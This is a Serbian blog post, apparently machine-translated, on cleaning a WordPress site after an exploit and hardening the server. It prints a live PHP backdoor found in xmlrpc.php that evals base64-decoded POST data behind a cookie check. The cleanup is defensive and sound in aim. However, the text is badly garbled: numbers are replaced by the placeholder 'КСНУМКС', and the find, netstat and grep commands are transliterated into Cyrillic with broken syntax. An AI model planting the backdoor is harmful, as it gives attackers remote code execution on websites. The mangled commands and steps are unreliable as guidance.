WordPress Експлоатација - Очистите вирусне датотеке, СКЛ и безбедност сервера.

Пре него што прочитате овај чланак, требало би да видите пост овде, Да разумемо нешто. :)

Пронашао сам га у неколико датотека на блогу на stealthsettings.цом, кодови слични онима у наставку, који су се појавили као резултат вируса са подвиг од WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

кмлрпцАко је изнад о фајлу кмлрпц.пхп од поспан, На греп сервера, изгледа као доста ове врсте у изворним кодовима.

пппффиууу

Чишћења заражених датотека:

Оооокккк ...
КСНУМКС. Најбоље решење, као што се то ради резерваИ очишћена база података за стергети датотеке WordPress (вп-цонфиг.пхп и датотеке које нису строго повезане са вп платформом можете задржати са сервера и отпремити оригиналне из верзије 2.5.1 (Овом приликом и направити упграде верзија :) вп) http://wordpress.org/download/ . Обришите укључујући и фајлови тема ако не верујете да су њихови пажљивом проверавању.

Чини се да су погођени и фајлове од тема које нису коришћене и раније на блогу и једноставно мењање тема, не решава проблем.

./андрееа/вп-цонтент/тхемес/default/индек.пхп:

КСНУМКС. Тражи и избришете све фајлове са:... * _нев.пхп, _олд.пхп *, * Јпгг, гифф *, * Пнгг и ВП-Инфо.ткт фајл, ако их има.

наћи. -име “* _нев.пхп”
наћи. -име “* _олд.пхп”
наћи. -име “* .јпгг”
наћи. -име “* _гифф”
наћи. -име “* _пнгг”
наћи. -име “вп-инфо.ткт”

КСНУМКС. у / Тмп , Сеарцх и обрисати као тмпИвбзТКСНУМКС

СКЛ чишћење :

КСНУМКС. Табела у табели вп_options Проверите и обришите линије: интернал_линкс_цацхе, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Све у вп_options, Иди на ацтиве_плугинс и брисање ако постоји плугин који завршава у једном од локала _нев.пхп *, * _олд.пхп, јпгг *, *.. гифф, *. пнгг или ако се сумња на другом локалу, проверите пажљиво.

КСНУМКС. У табели вп_усерс, Види да ли постоји корисник који није написао ништа у његовом праву, колона усер_ниценаме. Избришите овог корисника, али запамтите број у колони ИД. Овај корисник ће вероватно користити "WordPress”Ца усер_логин се ствара и појави се на КСНУМКС: КСНУМКС: КСНУМКС КСНУМКС-КСНУМКС-КСНУМКС.

КСНУМКС. Мергети у табелул вп_усермета и избрисати све линије које припадају ИД горе.

Након што извршите ово чишћење СКЛ-а, онемогућите и активирајте било који додатак. (у блогу -> Контролна табла -> Додаци)

Сецуре сервер:

КСНУМКС. Погледајте шта директоријуме и датотеке "писати"(chmod 777) и покушај да се стави а chmod који више неће дозволити њихово писање на било ком нивоу. (chmod 644, на пример)

Нађи. -Перм-КСНУМКС-Лс

КСНУМКС. Погледајте шта датотеке имају битну сет Суид или сгид . Ако не користите ове фајлове ставио на њих chmod 0 или деинсталирате пакет да садржи. Они су веома опасни, јер они извршавају привилегије "група"Или"корен"Не са нормалним корисничких привилегија да изврши тај фајл.

финд /-типе ф-Перм-КСНУМКС-Лс
финд /-типе ф-Перм-КСНУМКС-Лс

КСНУМКС. Проверите који портови су отворени и покушајте да затворите или обезбеди онима који се не користе.

нетстат-| греп-и слушати

Толико. Видим Неки блогови су забрањени de Google Search а други кажу "Добро их је урадио!!!" . Па, урадио бих то за њих... али шта кажете ако Гугл почне да забрањује сви сајтови формирање  Је спам и пут тројанце (Тројан.Цлицкер.ХТМЛ) у колачићима?

Страствен за технологију, пишем са задовољством StealthSettings.цом од 2006. Имам велико искуство у оперативним системима: macOS, Windows си Linux, али и на програмским језицима и блогерским платформама (WordPress) и за онлајн продавнице (WooCommerce, Магенто, ПрестаСхоп).

како » АнтиВирус и сигурност » WordPress Експлоатација - Очистите вирусне датотеке, СКЛ и безбедност сервера.

1 мисао на „WordPress Експлоатација – Очистите вирусне датотеке, СКЛ и безбедност сервера. ”

Оставите коментар